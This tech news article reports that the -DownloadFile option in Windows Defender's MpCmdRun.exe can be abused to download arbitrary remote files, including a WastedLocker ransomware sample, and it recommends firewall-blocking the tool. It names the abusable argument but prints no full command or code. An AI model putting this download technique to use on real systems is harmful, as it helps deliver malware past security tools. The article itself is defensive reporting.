Microsoft’s Windows Defender MpCmdRun.exe can be manipulated to download malware


The recently updated MpCmdRun.exe tool in Windows 10 antivirus can easily be exploited to make Windows Defender download a malware

Microsoft Defender aka Windows Defender has proven to be a hardy anti-virus tool for defending Windows 10 PC/laptops/servers from malware, trojan, and other malicious scripts. After years of neglect, Microsoft put some labor into Windows Defender, retooled it, and renamed it as Microsoft Defender.  The retooled and renamed Microsoft Defender is now perhaps one of the top anti-malware apps for Windows 10. However, it is not without fault.

It so happens that a recently updated tool in Microsoft Defender can be easily manipulated to make the Microsoft Defender download malware. Security researcher Mohammad Askar has discovered that the recently updated MpCmdRun.exe command has a backdoor that could be easily manipulated to make the victim’s PC/laptop or server download malicious files from a remote location.

Microsoft has recently released the updated version of the Microsoft Antimalware Service Command Line Utility, also known as MpCmdRun.exe. This is a process that is associated with Microsoft Defender’s anti-spyware and it protects the system against Internet threats such as spyware, adware, and trojans. The new update in MpCmdRun.exe has a new -DownloadFile command-line argument. Askar found that he could use this command-line to make the Windows 10 device download any remotely-stored file.

The new download file feature in MpCmdRun.exe was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9 and is vulnerable to this exploit. Bleeping Computer used Askar’s PoC to download the resources.exe file, the WastedLocker Ransomware sample used in a recent Garmin attack.

However, Microsoft Defender thankfully scans files downloaded even by itself so it was able to flag the malicious download. However, it is not known whether other anti-virus software would flag such downloads. The easiest way to prevent any exploit is to just block MpCmdRun.exe from connecting to remote locations, and IT admins can just set up a firewall rule to limit Internet access.


About Author

"The Internet is the first thing that humanity has built that humanity doesn't understand, the largest experiment in anarchy that we have ever had." Eric Schmidt

Notify of
Inline Feedbacks
View all comments